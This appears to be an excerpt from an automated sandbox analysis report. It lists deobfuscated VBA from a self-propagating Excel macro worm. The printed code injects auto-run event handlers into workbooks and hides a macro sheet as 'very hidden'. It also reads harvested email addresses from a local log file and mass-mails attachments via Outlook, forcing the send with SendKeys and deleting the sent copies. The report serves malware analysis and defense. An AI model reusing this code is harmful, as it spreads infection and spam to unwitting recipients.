                                                                                                                                                    254

                                                                                                                                                    wb.Excel4MacroSheets(1).Visible = xlSheetVeryHidden

                                                                                                                                                    Excel4MacroSheets

                                                                                                                                                    xlSheetVeryHidden

                                                                                                                                                    255

                                                                                                                                                    End Sub

                                                                                                                                                    Subroutine

                                                                                                                                                    Massive_SendMailAPIs: 19, Strings: 3, Number of lines: 30, Relevance: 33.03

                                                                                                                                                    APIsMeta Information

                                                                                                                                                    Part of subcall function if_outlook_open@ToDOLE: InstancesOf

                                                                                                                                                    Part of subcall function if_outlook_open@ToDOLE: InStr

                                                                                                                                                    Part of subcall function if_outlook_open@ToDOLE: Description

                                                                                                                                                    CreateObject

                                                                                                                                                    CreateItem

                                                                                                                                                    olMailItem

                                                                                                                                                    Subject

                                                                                                                                                    Body

                                                                                                                                                    Email_Address

                                                                                                                                                    CC_email_add

                                                                                                                                                    Add

                                                                                                                                                    Attachment

                                                                                                                                                    display

                                                                                                                                                    Print

                                                                                                                                                    DoEvents

                                                                                                                                                    DoEvents

                                                                                                                                                    DoEvents

                                                                                                                                                    SendKeys

                                                                                                                                                    DoEvents

                                                                                                                                                    StringsDecrypted Strings
                                                                                                                                                    "Outlook.Application"
                                                                                                                                                    "setforth "
                                                                                                                                                    "%s"
                                                                                                                                                    LineInstructionMeta Information
                                                                                                                                                    561

                                                                                                                                                    Private Sub Massive_SendMail(Email_Address$, Subject$, Body$, CC_email_add$, Attachment$)

                                                                                                                                                    562

                                                                                                                                                    Dim objOL as Object

                                                                                                                                                    563

                                                                                                                                                    Dim itmNewMail as Object

                                                                                                                                                    564

                                                                                                                                                    If Not if_outlook_open Then

                                                                                                                                                    564

                                                                                                                                                    Exit Sub

                                                                                                                                                    564

                                                                                                                                                    Endif

                                                                                                                                                    566

                                                                                                                                                    Set objOL = CreateObject("Outlook.Application")

                                                                                                                                                    CreateObject

                                                                                                                                                    567

                                                                                                                                                    Set itmNewMail = objOL.CreateItem(olMailItem)

                                                                                                                                                    CreateItem

                                                                                                                                                    olMailItem

                                                                                                                                                    569

                                                                                                                                                    With itmNewMail

                                                                                                                                                    570

                                                                                                                                                    . Subject = Subject

                                                                                                                                                    Subject

                                                                                                                                                    571

                                                                                                                                                    . Body = Body

                                                                                                                                                    Body

                                                                                                                                                    572

                                                                                                                                                    . To = Email_Address

                                                                                                                                                    Email_Address

                                                                                                                                                    573

                                                                                                                                                    . CC = CC_email_add

                                                                                                                                                    CC_email_add

                                                                                                                                                    574

                                                                                                                                                    . Attachments.Add Attachment

                                                                                                                                                    Add

                                                                                                                                                    Attachment

                                                                                                                                                    575

                                                                                                                                                    . DeleteAfterSubmit = True

                                                                                                                                                    576

                                                                                                                                                    End With

                                                                                                                                                    577

                                                                                                                                                    On Error Goto continue

                                                                                                                                                    577

                                                                                                                                                    SendEmail:

                                                                                                                                                    579

                                                                                                                                                    itmNewMail.display

                                                                                                                                                    display

                                                                                                                                                    580

                                                                                                                                                    Debug.Print "setforth "

                                                                                                                                                    Print

                                                                                                                                                    581

                                                                                                                                                    DoEvents

                                                                                                                                                    DoEvents

                                                                                                                                                    582

                                                                                                                                                    DoEvents

                                                                                                                                                    DoEvents

                                                                                                                                                    583

                                                                                                                                                    DoEvents

                                                                                                                                                    DoEvents

                                                                                                                                                    584

                                                                                                                                                    SendKeys "%s", Wait := True

                                                                                                                                                    SendKeys

                                                                                                                                                    585

                                                                                                                                                    DoEvents

                                                                                                                                                    DoEvents

                                                                                                                                                    586

                                                                                                                                                    Goto SendEmail

                                                                                                                                                    586

                                                                                                                                                    continue:

                                                                                                                                                    588

                                                                                                                                                    Set objOL = Nothing

                                                                                                                                                    589

                                                                                                                                                    Set itmNewMail = Nothing

                                                                                                                                                    590

                                                                                                                                                    End Sub

                                                                                                                                                    Subroutine

                                                                                                                                                    copytoworkbookAPIs: 1, Strings: 18, Number of lines: 22, Relevance: 28.522

                                                                                                                                                    APIsMeta Information

                                                                                                                                                    DQUOTE

                                                                                                                                                    StringsDecrypted Strings
                                                                                                                                                    """"
                                                                                                                                                    "Public WithEvents xx As Application"
                                                                                                                                                    "Private Sub Workbook_open()"
                                                                                                                                                    "Set xx = Application"
                                                                                                                                                    "On Error Resume Next"
                                                                                                                                                    "Application.DisplayAlerts = False"
                                                                                                                                                    "Call do_what"
                                                                                                                                                    "End Sub"
                                                                                                                                                    "Private Sub xx_workbookOpen(ByVal wb As Workbook)"
                                                                                                                                                    "On Error Resume Next"
                                                                                                                                                    "wb.VBProject.References.AddFromGuid _"
                                                                                                                                                    "GUID:="
                                                                                                                                                    "Major:=5, Minor:=3"
                                                                                                                                                    "Application.ScreenUpdating = False"
                                                                                                                                                    "Application.DisplayAlerts = False"
                                                                                                                                                    "copystart wb"
                                                                                                                                                    "Application.ScreenUpdating = True"
                                                                                                                                                    "End Sub"
                                                                                                                                                    LineInstructionMeta Information
                                                                                                                                                    13

                                                                                                                                                    Private Sub copytoworkbook()

                                                                                                                                                    14

                                                                                                                                                    Const DQUOTE = """"

                                                                                                                                                    15

                                                                                                                                                    With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule

                                                                                                                                                    16

                                                                                                                                                    . InsertLines 1, "Public WithEvents xx As Application"

                                                                                                                                                    17

                                                                                                                                                    . InsertLines 2, "Private Sub Workbook_open()"

                                                                                                                                                    18

                                                                                                                                                    . InsertLines 3, "Set xx = Application"

                                                                                                                                                    19

                                                                                                                                                    . InsertLines 4, "On Error Resume Next"

                                                                                                                                                    20

                                                                                                                                                    . InsertLines 5, "Application.DisplayAlerts = False"

                                                                                                                                                    21

                                                                                                                                                    . InsertLines 6, "Call do_what"

                                                                                                                                                    22

                                                                                                                                                    . InsertLines 7, "End Sub"

                                                                                                                                                    23

                                                                                                                                                    . InsertLines 8, "Private Sub xx_workbookOpen(ByVal wb As Workbook)"

                                                                                                                                                    24

                                                                                                                                                    . InsertLines 9, "On Error Resume Next"

                                                                                                                                                    25

                                                                                                                                                    . InsertLines 10, "wb.VBProject.References.AddFromGuid _"

                                                                                                                                                    26

                                                                                                                                                    . InsertLines 11, "GUID:=" & DQUOTE & "{0002E157-0000-0000-C000-000000000046}" & DQUOTE & ", _"

                                                                                                                                                    DQUOTE

                                                                                                                                                    27

                                                                                                                                                    . InsertLines 12, "Major:=5, Minor:=3"

                                                                                                                                                    28

                                                                                                                                                    . InsertLines 13, "Application.ScreenUpdating = False"

                                                                                                                                                    29

                                                                                                                                                    . InsertLines 14, "Application.DisplayAlerts = False"

                                                                                                                                                    30

                                                                                                                                                    . InsertLines 15, "copystart wb"

                                                                                                                                                    31

                                                                                                                                                    . InsertLines 16, "Application.ScreenUpdating = True"

                                                                                                                                                    32

                                                                                                                                                    . InsertLines 17, "End Sub"

                                                                                                                                                    34

                                                                                                                                                    End With

                                                                                                                                                    35

                                                                                                                                                    End Sub

                                                                                                                                                    Function

                                                                                                                                                    get_ten_addressAPIs: 14, Strings: 3, Number of lines: 9, Relevance: 25.509

                                                                                                                                                    APIsMeta Information

                                                                                                                                                    Split

                                                                                                                                                    Part of subcall function ReadOut@ToDOLE: CreateObject

                                                                                                                                                    Part of subcall function ReadOut@ToDOLE: OpenTextFile

                                                                                                                                                    Part of subcall function ReadOut@ToDOLE: ReadAll

                                                                                                                                                    Part of subcall function ReadOut@ToDOLE: Close

                                                                                                                                                    vbCrLf

                                                                                                                                                    Split

                                                                                                                                                    Part of subcall function RadomNine@ToDOLE: Randomize

                                                                                                                                                    Part of subcall function RadomNine@ToDOLE: Int

                                                                                                                                                    Part of subcall function RadomNine@ToDOLE: Rnd

                                                                                                                                                    UBound

                                                                                                                                                    LBound

                                                                                                                                                    UBound

                                                                                                                                                    CInt

                                                                                                                                                    StringsDecrypted Strings
                                                                                                                                                    """"
                                                                                                                                                    "D:\Collected_Address\log.txt"
                                                                                                                                                    "$$"
                                                                                                                                                    LineInstructionMeta Information
                                                                                                                                                    621

                                                                                                                                                    Private Function get_ten_address() as String

                                                                                                                                                    622

                                                                                                                                                    Dim singleAddress_arr, krr, i as Integer

                                                                                                                                                    623

                                                                                                                                                    get_ten_address = ""

                                                                                                                                                    624

                                                                                                                                                    singleAddress_arr = Split(ReadOut("D:\Collected_Address\log.txt"), vbCrLf)

                                                                                                                                                    Split

                                                                                                                                                    vbCrLf

                                                                                                                                                    625

                                                                                                                                                    krr = Split(RadomNine(UBound(singleAddress_arr) - LBound(singleAddress_arr) + 1), "$$")

                                                                                                                                                    Split

                                                                                                                                                    UBound

                                                                                                                                                    LBound

                                                                                                                                                    626

                                                                                                                                                    For i = 1 To UBound(krr)

                                                                                                                                                    UBound

                                                                                                                                                    627

                                                                                                                                                    get_ten_address = get_ten_address & ";" & singleAddress_arr(CInt(krr(i)) - 1)

                                                                                                                                                    CInt

                                                                                                                                                    628

                                                                                                                                                    Next i

                                                                                                                                                    UBound

                                                                                                                                                    629

                                                                                                                                                    End Function

                                                                                                                                                    Function

                                                                                                                                                    ReadOutAPIs: 4, Strings: 1, Number of lines: 8, Relevance: 7.508

                                                                                                                                                    APIsMeta Information

                                                                                                                                                    CreateObject

                                                                                                                                                    OpenTextFile

                                                                                                                                                    ReadAll

                                                                                                                                                    Close

                                                                                                                                                    StringsDecrypted Strings
                                                                                                                                                    "scRiPTinG.fiLEsysTeMoBjEcT"
                                                                                                                                                    LineInstructionMeta Information
                                                                                                                                                    631

                                                                                                                                                    Private Function ReadOut(FullPath) as String

                                                                                                                                                    632

                                                                                                                                                    On Error Resume Next

                                                                                                                                                    633

                                                                                                                                                    Dim Fso, FileText

                                                                                                                                                    634

                                                                                                                                                    Set Fso = CreateObject("scRiPTinG.fiLEsysTeMoBjEcT")

                                                                                                                                                    CreateObject

                                                                                                                                                    635

                                                                                                                                                    Set FileText = Fso.OpenTextFile(FullPath, 1, False, - 1)

                                                                                                                                                    OpenTextFile

                                                                                                                                                    636

                                                                                                                                                    ReadOut = FileText.ReadAll

                                                                                                                                                    ReadAll

                                                                                                                                                    637

                                                                                                                                                    FileText.Close

                                                                                                                                                    Close

                                                                                                                                                    638

                                                                                                                                                    End Function

                                                                                                                                                    Function

                                                                                                                                                    RadomNineAPIs: 3, Strings: 1, Number of lines: 22, Relevance: 6.022

                                                                                                                                                    APIsMeta Information

                                                                                                                                                    Randomize

                                                                                                                                                    Int

                                                                                                                                                    Rnd

                                                                                                                                                    StringsDecrypted Strings
                                                                                                                                                    """"
                                                                                                                                                    LineInstructionMeta Information
                                                                                                                                                    603

                                                                                                                                                    Private Function RadomNine(length as Integer) as String

                                                                                                                                                    604

                                                                                                                                                    Dim jj as Integer, k as Integer, i as Integer

                                                                                                                                                    605

                                                                                                                                                    RadomNine = ""

                                                                                                                                                    606

                                                                                                                                                    If length <= 0 Then

                                                                                                                                                    606

                                                                                                                                                    Exit Function

                                                                                                                                                    606

                                                                                                                                                    Endif

                                                                                                                                                    607

                                                                                                                                                    If length <= 10 Then

                                                                                                                                                    608

                                                                                                                                                    For i = 1 To length

                                                                                                                                                    609

                                                                                                                                                    RadomNine = RadomNine & "$$" & i

                                                                                                                                                    610

                                                                                                                                                    Next i

                                                                                                                                                    611

                                                                                                                                                    Exit Function

                                                                                                                                                    612

                                                                                                                                                    Endif

                                                                                                                                                    613

                                                                                                                                                    jj = length / 10

                                                                                                                                                    614

                                                                                                                                                    Randomize

                                                                                                                                                    Randomize

                                                                                                                                                    615

                                                                                                                                                    For i = 1 To 10

                                                                                                                                                    616

                                                                                                                                                    k = Int(Rnd * (jj * i - m - 1)) + 1

                                                                                                                                                    Int

                                                                                                                                                    Rnd

                                                                                                                                                    617

                                                                                                                                                    If m + k <> 1 Then

                                                                                                                                                    617

                                                                                                                                                    RadomNine = RadomNine & "$$" & m + k

                                                                                                                                                    617

                                                                                                                                                    Endif

                                                                                                                                                    618

                                                                                                                                                    m = m + k

                                                                                                                                                    619

                                                                                                                                                    Next

                                                                                                                                                    620

                                                                                                                                                    End Function

                                                                                                                                                    Reset < >